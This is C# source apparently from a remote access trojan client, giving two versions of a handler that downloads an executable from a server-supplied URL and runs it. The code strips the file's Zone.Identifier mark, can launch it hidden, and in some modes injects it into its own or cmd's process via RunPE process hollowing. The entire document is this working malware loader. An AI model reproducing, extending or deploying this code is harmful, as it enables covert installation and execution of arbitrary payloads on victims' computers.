public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command,
Client client)
{
new Packets.ClientPackets.Status("Downloading file...").Execute(client);
new Thread(() =>
{
string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
Helper.Helper.GetRandomFilename(12, ".exe"));
try
{
using (WebClient c = new WebClient())
{
c.Proxy = null;
c.DownloadFile(command.URL, tempFile);
}
}
catch
{
new Packets.ClientPackets.Status("Download failed!").Execute(client);
return;
}
new Packets.ClientPackets.Status("Downloaded File!").Execute(client);
try
{
DeleteFile(tempFile + ":Zone.Identifier");
var bytes = File.ReadAllBytes(tempFile);
if (bytes[0] != 'M' && bytes[1] != 'Z')
{
throw new Exception("no pe file");
}
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = command.RunHidden;
startInfo.FileName = tempFile;
Process.Start(startInfo);
}
catch
{
DeleteFile(tempFile);
new Packets.ClientPackets.Status("Execution failed!").Execute(client);
return;
}
new Packets.ClientPackets.Status("Executed File!").Execute(client);
}).Start();
}
public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command,
Client client)
{
new Packets.ClientPackets.Status("Downloading file...").Execute(client);
new Thread(() =>
{
try
{
if (command.Type == "drop")
{
#region drop
string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
Helper.Helper.GetRandomFilename(12, ".exe"));
try
{
using (WebClient c = new WebClient())
{
c.Proxy = null;
c.DownloadFile(command.URL, tempFile);
}
}
catch
{
new Packets.ClientPackets.Status("Download failed!").Execute(client);
return;
}
new Packets.ClientPackets.Status("Downloaded File!").Execute(client);
try
{
DeleteFile(tempFile + ":Zone.Identifier");
var bytes = File.ReadAllBytes(tempFile);
if (bytes[0] != 'M' && bytes[1] != 'Z')
{
throw new Exception("Not an .EXE file!");
}
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = command.RunHidden;
startInfo.FileName = tempFile;
Process.Start(startInfo);
}
catch (Exception ex)
{
DeleteFile(tempFile);
new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
return;
}
#endregion
}
else if (command.Type == "self")
{
byte[] fileBytes = Download(command.URL, client);
if (fileBytes == null)
{
new Packets.ClientPackets.Status("Download failed!").Execute(client);
}
RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "self", "" }, client);
}
else if (command.Type == "cmd")
{
byte[] fileBytes = Download(command.URL, client);
if (fileBytes == null)
{
new Packets.ClientPackets.Status("Download failed!").Execute(client);
}
RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "sys", "cmd" }, client);
}
else
{
new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
}
}
catch (Exception ex)
{
new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
return;
}
new Packets.ClientPackets.Status("Executed File!").Execute(client);
}).Start();
}
